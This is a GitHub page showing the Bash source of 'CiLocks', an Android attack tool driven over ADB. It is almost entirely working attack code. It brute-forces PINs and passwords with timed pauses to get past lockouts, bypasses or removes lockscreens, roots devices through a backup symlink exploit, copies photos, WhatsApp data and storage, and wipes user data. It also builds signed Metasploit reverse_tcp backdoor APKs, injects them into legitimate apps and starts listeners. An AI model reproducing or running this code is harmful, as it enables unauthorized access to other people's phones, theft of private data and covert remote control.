forked from tegal1337/CiLocks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
cilocks
373 lines (337 loc) · 10 KB
/
cilocks
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
#!/usr/bin/env bash
m="\e[0;31m" # merah
k="\e[0;33m" # kuning
h="\e[0;32m" # hijau
b="\e[0;34m" # biru
lm="\e[1;31m" # merah terang
lk="\e[1;33m" # kuning terang
lh="\e[1;32m" # hijau terang
lb="\e[1;34m" # langit biru
n="\e[0m" # netral
w="\e[1;37m" # putih tebal
clear
[[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo -e ${m} "You must be root to run the script${n}"; echo ; exit 1; }
path=$(pwd)
name='cilocks'
function files() {
file=$path/$name
bash $file
}
clear
function banner() {
echo -e "${lb}
_______ __ __
/ ____(_) / ____ _____/ /_______
/ / / / / / __ \/ ___/ //_/ ___/
/ /___/ / /___/ /_/ / /__/ ,< (__ )
\____/_/_____/\____/\___/_/|_/____/
${n}"
echo -e "${m} Crack Interface LockScreen${n}"
echo -e "${lb} LoliC0d3 - Tegal1337${n}"
}
banner
echo -e "${lh}
1.Update
2.Brute Pin 4 Digit
3.Brute Pin 6 Digit
4.Brute LockScreen Using Wordlist
5.Bypass LockScreen {Antiguard} Not Support All OS Version
6.Root Android {Supersu} Not Support All OS Version
7.Jump To Adb Toolkit
8.Reset Data
9.Remove LockScreen {Root}
10.Jump To Metasploit
99.Exit
${n}"
read -p "senpai@tegalsec:~# " select
if [[ $select == 1 ]]; then
echo "This Latest Version!"
elif [[ $select == 2 ]]; then
#adb shell input keyevent 26 #Pressing the lock button
adb shell input keyevent 82
echo "Brute Pin 4 Digit"
for i in {0000..9999}; do
echo "Try =>" $i
for (( j=0; j<${#i}; j++ )); do
adb shell input keyevent $((`echo ${i:$j:1}`+7))
done
adb shell input keyevent 66
if ! (( `expr $i + 1` % 5 )); then
adb shell input keyevent 66
echo "Delay Limit 30s"
sleep 30
adb shell input keyevent 82
adb shell input swipe 407 1211 378 85
fi
done
elif [[ $select == 3 ]]; then
# adb shell input keyevent 26 #Pressing the lock button
adb shell input keyevent 82
echo "Brute Pin 6 Digit"
for i in {000000..999999}; do
echo "Try =>" $i
for (( j=0; j<${#i}; j++ )); do
adb shell input keyevent $((`echo ${i:$j:1}`+7))
done
adb shell input keyevent 66
if ! (( `expr $i + 1` % 5 )); then
adb shell input keyevent 66
echo "Delay Limit 30s"
secs=$((1 * 30))
while [ $secs -gt 0 ]; do
echo -ne "$secs\033[0K\r"
sleep 1
: $((secs--))
done
sleep 30
adb shell input keyevent 82
adb shell input swipe 407 1211 378 85
fi
done
elif [[ $select == 4 ]]; then
# adb shell input keyevent 26 #Pressing the lock button
adb shell input keyevent 82
echo "Brute LockScreen Using Wordlist"
read -p "list -> " files
for i in `cat $files`; do
echo "Try =>" $i
for (( j=0; j<${#i}; j++ )); do
adb shell input keyevent $((`echo ${i:$j:1}`+7))
done
adb shell input keyevent 66
if ! (( `expr $i + 1` % 5 )); then
adb shell input keyevent 66
echo "Delay Limit 30s"
secs=$((1 * 30))
while [ $secs -gt 0 ]; do
echo -ne "$secs\033[0K\r"
sleep 1
: $((secs--))
done
sleep 30
adb shell input keyevent 82
adb shell input swipe 407 1211 378 85
fi
done
elif [[ $select == 5 ]]; then
adb shell pm list packages | grep io.kos.antiguard 2>/dev/null > /dev/null
isInstalled=$?
if [ $isInstalled -eq 0 ]; then
adb uninstall io.kos.antiguard
else
adb install ./AntiGuard/AntiGuard.apk
adb shell am start io.kos.antiguard/.unlock
fi
elif [[ $select == 6 ]]; then
adb restore modules/fakebackup.ab
command "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99 2>/dev/null; do :; done; echo 'Overwrote local.prop!';"
if command "cat /data/local.prop"
then echo "Succesfully rooted!"
echo "Requires a reboot..."
adb reboot
sleep 2
adb wait-for-device
command "mount -o rw,remount /system"
adb push modules/su-static /system/xbin/su
command "/data/local/tmp/busybox chown 0:0 /system/xbin/su"
command "/data/local/tmp/busybox chmod 6777 /system/xbin/su"
adb push modules/Superuser.apk /system/app/
command "rm /data/local.prop"
adb reboot
fi
elif [[ $select == 7 ]]; then
clear
function mmeta() {
banner
echo -e "${m} Adb Toolkit${n}"
}
mmeta
echo -e "${lh}
1.Shell
2.ScreenShot
3.Copy All Camera Photo
4.Copy All WhatsApp Folder
5.Copy All Data Storage
6.Manual Copy {Costum}
99.Menu
${n} "
read -p "senpai@tegalsec:~# " select
if [[ $select == 1 ]]; then
echo "Opening Shell..."
sleep 3
adb shell
elif [[ $select == 2 ]]; then
export time=$(date +"%T")
path=Files/Screenshot
file=screenshoot-$time.png
paths=$path/$file
adb exec-out screencap -p > $file
sudo mv $file $paths
echo "Your File Saved In $paths "
elif [[ $select == 3 ]]; then
export time=$(date +"%T")
path=Files
dir=DCIM-$time
paths=$path/$dir
adb pull /sdcard/DCIM/ $path/$dir
echo "Your File Saved In $paths "
elif [[ $select == 4 ]]; then
export time=$(date +"%T")
path=Files
dir=WhatsApp-$time
paths=$path/$dir
adb pull /sdcard/WhatsApp/ $paths
echo "Your File Saved In $paths "
elif [[ $select == 5 ]]; then
export time=$(date +"%T")
path=Files
dir=sdcard-$time
paths=$path/$dir
adb pull /sdcard/ $paths
echo "Your File Saved In $paths "
elif [[ $select == 6 ]]; then
echo "Ex: /sdcard/Document/"
read -p "Enter Path: " pathz
read -p "Enter Name Folder: " dir
path=Files
paths=$path/$dir
adb pull $pathz $paths
echo "Your File Saved In $paths "
elif [[ $select == 99 ]]; then
files
fi
elif [[ $select == 8 ]]; then
echo -e "${lh}
1.Fastboot
2.Recovery
${n}"
read -p "senpai@tegalsec:~# " select
if [[ $select == 1 ]]; then
adb reboot bootloader
deviceConnected=konek
if [ "$(konek)" = 'NO' ]; then
echo "Waiting Phone..."
$adb wait-for-device
fi
fastboot devices
fastboot erase userdata
fastboot erase cache
elif [[ $slect == 2 ]]; then
deviceConnected=konek
if [ "$(konek)" = 'NO' ]; then
echo "Waiting Phone..."
$adb wait-for-device
fi
adb devices
adb shell recovery --wipe_data
else
echo -e "${m} Your Brain Error!${n}"
fi
elif [[ $select == 9 ]]; then
rem=$(adb shell su -c rm /data/system/*.key | adb reboot )
echo $rem
echo "success"
elif [[ $select == 10 ]]; then
clear
function mmeta() {
banner
echo -e "${m} Metasploit Backdoor Generator${n}"
}
mmeta
echo -e "${lh}
1.Install Application
2.Create Payload Backdoor {Msfvenom} Singed
3.Run Metasploit
4.Inject Payload In Original Application
99.Menu
${n}"
read -p "senpai@tegalsec:~# " select
if [[ $select == 1 ]]; then
read -p "Enter Ur Application: " app
read -p "Run Application {Y/N}: " run
if [ $run == "Y" ] || [ $run == "y" ]; then
read -p "Enter Package Application Name: " pkg
adb install $app
adb shell am start $pkg/.unlock
else
adb install $app
fi
elif [[ $select == 2 ]]; then
path="backdoor"
loli="loli.apk"
read -p "Enter LHOST: " host
read -p "Enter LPORT: " port
read -p "Application Name: " app
paths=$path/$loli
echo -e "${lb}Wait Creating Backdoor...${n}"
msfvenom -p android/meterpreter/reverse_tcp lhost=$host lport=$port R> $paths
echo "Wait Installing Keystore..."
sleep 5
keytool -genkey -V -keystore $path/key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore $path/key.keystore $paths hacked
jarsigner -verify -verbose -certs $paths
zipalign -v 4 $paths $path'/'$app'.apk'
milf=$path/$app'.apk'
rm $paths
rm $path/key.keystore
echo "Your Backdoor Created In" $milf
elif [[ $select == 3 ]]; then
clear
mmeta
payload='android/meterpreter/reverse_tcp'
echo -e "${m}
Payload => $payload ${n}${lh}
Listener
1.exploit/multi/handler {Default}
2.post/android/manage/remove_lock
3.post/android/manage/remove_lock_root
${n}"
read -p "senpai@tegalsec:~# " select
if [[ $select == 1 ]]; then
read -p "LHOST: " host
read -p "LPORT: " port
msfconsole=msfconsole
exploit='use exploit/multi/handler'
xterm -T " CiLocks Exploit " -geometry 100x35 -e "$msfconsole -x '$exploit; set PAYLOAD $payload ; set lhost $host ; set lport $port; exploit; exit -y'"
elif [[ $select == 2 ]]; then
read -p "LHOST: " host
read -p "LPORT: " port
msfconsole=msfconsole
exploit='use post/android/manage/remove_lock'
xterm -T " CiLocks Exploit " -geometry 100x35 -e "$msfconsole -x '$exploit; set PAYLOAD $payload ; set lhost $host ; set lport $port; exploit; exit -y'"
elif [[ $select == 3 ]]; then
read -p "LHOST: " host
read -p "LPORT: " port
msfconsole=msfconsole
exploit='use post/android/manage/remove_lock_root'
xterm -T " CiLocks Exploit " -geometry 100x35 -e "$msfconsole -x '$exploit; set PAYLOAD $payload ; set lhost $host ; set lport $port; exploit; exit -y'"
fi
elif [[ $select == 4 ]]; then
path="backdoor"
loli="loli.apk"
read -p "Enter LHOST: " host
read -p "Enter LPORT: " port
read -p "Enter Original Application: " ori
read -p "Application Name: " app
paths=$path/$loli
echo -e "${lb}Wait Creating Backdoor...${n}"
msfvenom --platform android -x $ori -p android/meterpreter/reverse_tcp lhost=$host lport=$port -o $paths
# if error,uncomment it
# echo "Wait Installing Keystore..."
# sleep 5
# keytool -genkey -V -keystore $path/key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore $path/key.keystore $paths hacked
# jarsigner -verify -verbose -certs $paths
# zipalign -v 4 $paths $path'/'$app'.apk'
# milf=$path/$app'.apk'
# rm $paths
# rm $path/key.keystore
echo "Your Backdoor Created In" $milf
elif [[ $select == 99 ]]; then
files
fi
elif [[ $select == 99 ]]; then
echo "oke"
else
echo -e "${m} Your Brain Error!${n}"
fi